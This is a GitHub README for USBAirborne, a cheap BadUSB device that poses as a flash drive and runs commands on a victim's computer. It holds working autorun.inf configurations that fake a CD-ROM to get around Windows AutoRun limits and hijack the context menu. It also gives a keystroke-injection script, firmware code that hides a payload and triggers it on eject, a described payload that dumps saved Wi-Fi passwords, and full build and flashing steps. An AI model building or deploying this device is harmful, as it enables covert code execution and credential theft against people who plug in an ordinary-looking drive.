Skip to content

Push3AX/USBAirborne

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

USBAirborne

An Advanced BadUSB


English | 中文

USBAirborne masquerades as a USB drive, but when the victim plugs it into a computer, it executes specified commands or programs.

  • Supports BadUSB and AutoRun attacks
  • Built-in 4MB storage, can masquerade as a 4GB USB drive
  • Low cost, about 2 USD per unit
  • Standard G2 board shape, compatible with common USB flash drive shells


Quick Start

USBAirborne's attack behavior is controlled by the autorun.inf file in its root directory. It supports AutoRun attacks and BadUSB attacks, and both can be used together. The Payload directory contains a series of demo attack scripts.


AutoRun Attack

Copy AutorunDemo.inf from the Payload directory to the USBAirborne root directory, and rename it to autorun.inf.

After being plugged into a computer, USBAirborne appears as a 4GB USB drive. When the USB drive is opened, including by double-clicking, right-clicking and selecting Open, or opening it in a new window, USBAirborne executes the preset code and opens a browser to play a video.

Specifically, the [AutoRun] section in AutorunDemo.inf makes USBAirborne emulate a CD-ROM device to bypass Windows AutoRun restrictions:

[AutoRun]
autoplay=true

; Disguise the drive icon as a USB drive icon
icon=shell32.dll,79

; Drive name
label=USB

; Attack payload, here it opens a webpage
; To run an EXE or BAT from the USB root, place it there and change open to the file name
; Example: open=payload.exe
open=explorer https://www.bilibili.com/video/BV1zK4y1S71s/

; Hijack the right-click menu
; If the payload is changed, update these entries as well
shell\AutoRun=Open Drive(&D)
shell\AutoRun\Command=explorer https://www.bilibili.com/video/BV1zK4y1S71s/
shell\open\Command=explorer https://www.bilibili.com/video/BV1zK4y1S71s/
shell\opennewwindow\Command=explorer https://www.bilibili.com/video/BV1zK4y1S71s/

Disable CD-ROM Read-Only Mode

In the previous example, the configuration file makes USBAirborne emulate a read-only CD-ROM device, so files cannot be written or modified.

Turn on switch 1 on the USBAirborne PCB to disable attack mode. In this state, USBAirborne will not execute attack content and will no longer enter the read-only CD-ROM state.


BadUSB Attack

BadUSB is another attack mode. It performs operations by emulating keyboard input.

Copy BadUSB.inf from the Payload directory to the USBAirborne root directory, and rename it to autorun.inf.

After being plugged into a computer, USBAirborne emulates pressing Win+R to open the Run dialog, enters notepad to open Notepad, types demo content, and opens a webpage.

Specifically, the keyboard operations to execute are placed between the two [BadUSB] markers in BadUSB.inf:

[BadUSB]
[Win+R]
[Delay]
[Delay]
notepad
[Enter]
[Delay]
[Delay]
Hi! This is a test of USBAirborne
[Win+R]
[Delay]
[Delay]
https://www.bilibili.com/video/BV1zK4y1S71s/[Enter]
[BadUSB]

Save BadUSB Execution Results

Copy GrabWLAN.inf from the Payload directory to the USBAirborne root directory, and rename it to autorun.inf.

Also copy USB.AIRBORNE from the Payload directory to the USBAirborne root directory. This file is used to locate USBAirborne's drive letter.

After being plugged into a computer, USBAirborne executes a specific CMD command, exports WLAN configuration and passwords, and saves the CMD output to the USBAirborne root directory. The file name is the hostname plus a random number.

saveResult


Advanced BadUSB Commands

The BadUSB configuration file supports several shortcut keys and advanced commands:

  1. [Format]: Quick-format USBAirborne.
  2. [Enter]: Press the Enter key
  3. [Shift]: Press the Shift key
  4. [Capslock]: Toggle Caps Lock
  5. [Win]: Press the Windows key
  6. [Win+R]: Open the Run dialog
  7. [Alt+F4]: Close the current window
  8. [Win+D]: Show the desktop
  9. [Win+L]: Lock the computer
  10. [Win+E]: Open Windows Explorer
  11. [Ctrl+Alt+Del]: Open security options
  12. [Delay]: Wait for 500 milliseconds

Compiling Firmware

The USBAirborne firmware source code is located in the USBAirborne.uvproj directory.

Keil is required to compile the firmware. After installing Keil, open WCHISPTool, then click Function - Add WCH MCU Database to KEIL.

Then use Keil to open Project.uvproj in the USBAirborne.uvproj directory. The USBAirborne firmware should compile successfully.

Embed BadUSB Payload into Firmware

USBAirborne needs to read the payload from Flash when executing BadUSB. If you want BadUSB to execute faster or want to completely hide the payload, you can embed the payload directly into the firmware.

BadUSBDemo() in Main.C is an example. Set ExecBadUSB to 1 and this payload will be executed.

UINT8 ExecBadUSB = 1;

void BadUSBDemo()
{
	UINT8 Payload[]="https://www.bilibili.com/video/BV1zK4y1S71s/\n";
	mDelaymS(1000);
	SendKey(KB_LeftShift, KB_NULL);
	mDelaymS(500);
	SendKey(KB_LeftGUI, KB_R);
	mDelaymS(500);
	SendString(Payload,sizeof(Payload)/sizeof(Payload[0]));
	mDelaymS(500);
}

void main(void)
{
	...
	while(1)
	{
		if(ExecBadUSB == 1 && AttackEnabled == 1)
		{
			ExecBadUSB=0;
			BadUSBDemo();
		}
		mDelaymS(100);
	}
	...
}

Trigger BadUSB at Other Times

BadUSB usually executes immediately after USBAirborne is plugged into a computer. If you want it to execute at another time, you can set ExecBadUSB to 1 in different USB UFI commands.

For example, setting ExecBadUSB to 1 in UFI_staStoUnit() in USB.c can execute the BadUSB payload when USBAirborne is ejected:

void  UFI_staStoUnit(void)
{
	CH375BULKDOWN = 0;
	CH375BULKUP = 0;
	BcswStatus = 0;
	mSenseKey = 0;
	mASC = 0;
	if(MassPara.cbw.cbwcb.buf1[4] & 0x02)
	{
		MediumPresent = (MassPara.cbw.cbwcb.buf1[4] & 0x01) ? 1 : 0;
	}
	else if(MassPara.cbw.cbwcb.buf1[4] & 0x01)
	{
		MediumPresent = 1;
	}
	ExecBadUSB=1; // Add this line
}

Manufacturing Guide

Hardware Design

USBAirborne's hardware design is open-sourced on OSHWHub. See:

https://oshwhub.com/PushEAX/3079905e2c434c54902d77ab60f6c747

BOM and Cost

Component ID Name Package Type Quantity Total Price (CNY)
C1,C4 10uF capacitor C0603 2 0.1
C2,C3 100nF capacitor C0603 2 0.1
R1,R2 22k resistor R0603 2 0.1
SW1 2-pin switch 1 2
U1 CH552G SOP-16_L10.0-W3.9 1 3.8
U2 P25Q32H-SSH-IT SOIC-8_L4.9-W3.9 1 2.2
USB1 USB2.0-A male USB-A-TH_USB-A-F-90 1 0.4

Note: CH552G can be replaced with CH551G or CH554G. P25Q32H can be replaced with other W25Q-compatible SPI Flash chips, with a maximum supported capacity of 16MB.

Manufacturing Steps

If you want to build your own USBAirborne, follow these brief steps:

  1. Download USBAirborne's Gerber file and send it to a PCB manufacturer for production.

  2. Refer to the BOM section and solder all components.

  3. Turn on the second switch on USBAirborne to enter programming mode.

  1. Download the USBAirborne firmware from here. Use WCHISPTool to flash the firmware.

  1. Exit programming mode, enable read/write mode, and copy autorun.inf to the USBAirborne root directory.

About

An Advanced BadUSB

Topics

Resources

Stars

108 stars

Watchers

3 watching

Forks

Packages

 
 
 

Contributors

Languages